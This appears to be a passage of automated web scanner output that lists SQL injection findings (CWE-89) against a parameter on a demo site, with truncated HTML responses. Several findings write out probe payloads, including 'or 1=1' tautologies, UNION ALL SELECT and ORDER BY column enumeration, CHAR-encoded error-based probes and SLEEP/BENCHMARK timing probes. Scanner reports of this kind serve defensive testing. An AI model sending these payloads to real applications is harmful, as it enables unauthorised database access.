\nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1506\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1507\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1508\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# ORDER BY 6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1509\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1510\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1511\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1512\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1513\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1514\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1515\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1516\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1517\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1518\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1519\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 